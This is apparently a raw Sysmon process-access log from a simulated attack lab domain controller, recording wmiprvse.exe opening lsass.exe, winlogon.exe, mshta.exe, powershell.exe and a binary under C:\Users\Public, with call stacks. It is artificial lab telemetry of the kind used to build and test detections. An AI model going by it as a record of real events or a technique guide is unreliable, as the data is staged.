15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022887Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022886Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022885Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022884Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022883Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022882Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022881Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022880Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022879Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022878Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022877Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022876Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022875Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022874Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022873Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022872Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2D06-00000000A301}5924C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022871Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022870Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022869Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2A06-00000000A301}1324C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022868Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 